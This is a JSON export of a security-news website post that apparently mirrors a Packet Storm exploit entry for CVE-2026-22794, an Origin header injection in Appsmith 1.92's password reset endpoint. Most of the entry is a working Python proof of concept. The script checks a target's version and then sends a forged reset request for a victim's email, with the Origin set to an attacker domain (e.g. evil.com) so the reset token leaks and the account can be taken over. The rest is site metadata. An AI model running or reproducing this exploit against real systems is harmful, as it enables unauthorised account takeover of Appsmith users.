{"id":38541,"date":"2026-02-02T11:40:37","date_gmt":"2026-02-02T11:40:37","guid":{"rendered":"http:\/\/localhost\/?p=38541"},"modified":"2026-02-02T11:40:37","modified_gmt":"2026-02-02T11:40:37","slug":"appsmith-192-origin-header-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38541","title":{"rendered":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:05&#8243;,&#8221;description&#8221;:&#8221;A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper trust in client\u2011supplied headers, Appsmith constructs password reset links&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Appsmith 1.92 Origin Header Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214667&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-22794&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Appsmith 1.92 Origin Header Injection                                                                                       |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.appsmith.com\/                                                                                                   |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/214539\/ \\u0026 CVE-2026-22794\\n    \\n    [+] Summary    : A critical vulnerability in Appsmith (versions 1.92) allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. \\n                     Due to improper trust in client\u2011supplied headers, Appsmith constructs password reset links based on the injected origin. This enables an attacker to hijack password \\n    \\t\\t\\t\\t reset tokens and perform full account takeover without authentication, simply by triggering a reset request for a known user email. \\n                     The issue affects the \/api\/v1\/users\/forgotPassword endpoint and can be exploited remotely.\\n    \\n    \\n    [+] POC : python poc.py\\n    \\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import argparse\\n    import requests\\n    import json\\n    import re\\n    \\n    def check_vulnerable(target_url):\\n        headers = {\\n            \\&#8221;User-Agent\\&#8221;: \\&#8221;Mozilla\/5.0 (compatible; ExploitPoC\/1.0)\\&#8221;\\n        }\\n    \\n        try:\\n            r = requests.get(\\n                target_url.rstrip(&#8216;\/&#8217;) + \\&#8221;\/\\&#8221;,\\n                headers=headers,\\n                timeout=10,\\n                verify=False\\n            )\\n    \\n            if r.status_code == 200 and \\&#8221;Appsmith\\&#8221; in r.text:\\n                version_match = re.search(\\n                    r\\&#8221;parseConfig\\\\(&#8216;v([0-9]+\\\\.[0-9]+)&#8217;\\\\)\\&#8221;,\\n                    r.text\\n                )\\n    \\n                if version_match:\\n                    try:\\n                        version = float(version_match.group(1))\\n                    except ValueError:\\n                        print(\\&#8221;[?] Version parsing failed &#8211; assuming vulnerable\\&#8221;)\\n                        return True\\n    \\n                    if version \\u003c= 1.92:\\n                        print(f\\&#8221;[+] Target is vulnerable! Version: v{version}\\&#8221;)\\n                        return True\\n                    else:\\n                        print(f\\&#8221;[-] Target is patched (version: v{version})\\&#8221;)\\n                        return False\\n                else:\\n                    print(\\&#8221;[?] Version not found &#8211; assuming vulnerable if Appsmith detected\\&#8221;)\\n                    return True\\n            else:\\n                print(\\&#8221;[-] Not an Appsmith instance or unreachable\\&#8221;)\\n                return False\\n    \\n        except Exception as e:\\n            print(f\\&#8221;[-] Error checking: {e}\\&#8221;)\\n            return False\\n    \\n    \\n    def exploit(target_url, email, evil_domain):\\n        vuln_path = \\&#8221;\/api\/v1\/users\/forgotPassword\\&#8221;\\n    \\n        headers = {\\n            \\&#8221;Origin\\&#8221;: f\\&#8221;https:\/\/{evil_domain}\\&#8221;,\\n            \\&#8221;Content-Type\\&#8221;: \\&#8221;application\/json\\&#8221;,\\n            \\&#8221;User-Agent\\&#8221;: \\&#8221;Mozilla\/5.0 (compatible; ExploitPoC\/1.0)\\&#8221;\\n        }\\n    \\n        payload = {\\n            \\&#8221;email\\&#8221;: email\\n        }\\n    \\n        full_url = f\\&#8221;{target_url.rstrip(&#8216;\/&#8217;)}{vuln_path}\\&#8221;\\n    \\n        print(f\\&#8221;[*] Sending malicious reset request to: {full_url}\\&#8221;)\\n        print(f\\&#8221;[*] Target email: {email}\\&#8221;)\\n        print(f\\&#8221;[*] Injected Origin: https:\/\/{evil_domain}\\&#8221;)\\n    \\n        try:\\n            r = requests.post(\\n                full_url,\\n                headers=headers,\\n                json=payload,\\n                timeout=10,\\n                verify=False\\n            )\\n    \\n            if r.status_code in [200, 201, 202] and \\&#8221;success\\&#8221; in r.text.lower():\\n                print(f\\&#8221;[+] Exploit succeeded! Status: {r.status_code}\\&#8221;)\\n                print(\\n                    f\\&#8221;[+] Check email for reset link \u2014 it should point to your evil domain \\&#8221;\\n                    f\\&#8221;(e.g., https:\/\/{evil_domain}\/&#8230; )\\&#8221;\\n                )\\n                print(\\&#8221;[+] If user clicks, token leaks to your server \u2192 takeover account.\\&#8221;)\\n    \\n                if r.text.strip():\\n                    try:\\n                        print(\\&#8221;\\\\nResponse body:\\\\n\\&#8221; + \\&#8221;-\\&#8221; * 60)\\n                        print(json.dumps(r.json(), indent=4))\\n                        print(\\&#8221;-\\&#8221; * 60)\\n                    except Exception:\\n                        print(\\&#8221;[!] Response is not valid JSON\\&#8221;)\\n    \\n            else:\\n                print(f\\&#8221;[-] Failed &#8211; Status: {r.status_code} (may be patched or invalid email)\\&#8221;)\\n                print(r.text[:500])\\n    \\n        except Exception as e:\\n            print(f\\&#8221;[-] Error: {e}\\&#8221;)\\n    \\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        parser = argparse.ArgumentParser(\\n            description=\\&#8221;CVE-2026-22794 PoC &#8211; Appsmith Origin Injection by indoushka\\&#8221;\\n        )\\n        parser.add_argument(\\n            \\&#8221;&#8211;target\\&#8221;,\\n            required=True,\\n            help=\\&#8221;Target Appsmith URL (e.g. https:\/\/appsmith.target.com)\\&#8221;\\n        )\\n        parser.add_argument(\\n            \\&#8221;&#8211;email\\&#8221;,\\n            help=\\&#8221;Target user email (e.g. victim@company.com) &#8211; required for exploit\\&#8221;\\n        )\\n        parser.add_argument(\\n            \\&#8221;&#8211;evil_domain\\&#8221;,\\n            help=\\&#8221;Your attacker domain (e.g. evil.com) &#8211; required for exploit\\&#8221;\\n        )\\n        parser.add_argument(\\n            \\&#8221;&#8211;check\\&#8221;,\\n            action=\\&#8221;store_true\\&#8221;,\\n            help=\\&#8221;Check if vulnerable without exploiting\\&#8221;\\n        )\\n    \\n        args = parser.parse_args()\\n    \\n        if args.check:\\n            check_vulnerable(args.target)\\n        else:\\n            if not args.email or not args.evil_domain:\\n                parser.error(\\&#8221;&#8211;email and &#8211;evil_domain are required for exploitation\\&#8221;)\\n            exploit(args.target, args.email, args.evil_domain)\\n    \\n    Greetings to :============================================================\\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n    ==========================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214667&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.6,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214667\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:05&#8243;,&#8221;description&#8221;:&#8221;A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,62,12,13,53,7,11,5],"class_list":["post-38541","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-96","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38541\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:05&#8243;,&#8221;description&#8221;:&#8221;A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38541\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-02T11:40:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667\",\"datePublished\":\"2026-02-02T11:40:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\"},\"wordCount\":869,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.6\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\",\"name\":\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-02T11:40:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38541","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:05&#8243;,&#8221;description&#8221;:&#8221;A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper...","og_url":"https:\/\/zero.redgem.net\/?p=38541","og_site_name":"zero redgem","article_published_time":"2026-02-02T11:40:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38541#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38541"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667","datePublished":"2026-02-02T11:40:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38541"},"wordCount":869,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.6","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38541#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38541","url":"https:\/\/zero.redgem.net\/?p=38541","name":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-02T11:40:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38541#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38541"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38541#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38541","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38541"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38541\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}